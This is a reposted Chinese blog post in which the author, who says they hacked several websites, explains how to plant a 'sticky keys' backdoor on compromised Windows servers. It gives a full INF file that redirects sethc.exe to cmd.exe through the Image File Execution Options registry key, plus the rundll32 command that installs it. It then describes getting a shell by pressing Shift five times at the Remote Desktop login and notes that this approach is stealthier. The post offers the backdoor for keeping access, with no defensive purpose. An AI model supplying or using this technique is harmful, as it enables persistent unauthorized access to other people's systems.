前幾天搞了幾個網(wǎng)站，之前搞的站一般不留后門，其實基本留了都被刪除了，這次下決心要搞個shift后門留著自己用的，秒殺給你介紹一個方法！

將下面的代碼保存成inf文件

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe

然后上傳到一個可以執(zhí)行目錄，比如我這里上傳到c:\windows\temp\i.inf 然后在命令行執(zhí)行

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf

然后遠程登錄3389，按5下shift即可跳出cmd.exe

為什么要命令行？隱蔽性？大家自行掂量

轉(zhuǎn)載：秒殺博客

版權聲明：本站文章來源標注為YINGSOO的內(nèi)容版權均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權，請聯(lián)系alex-e#qq.com處理。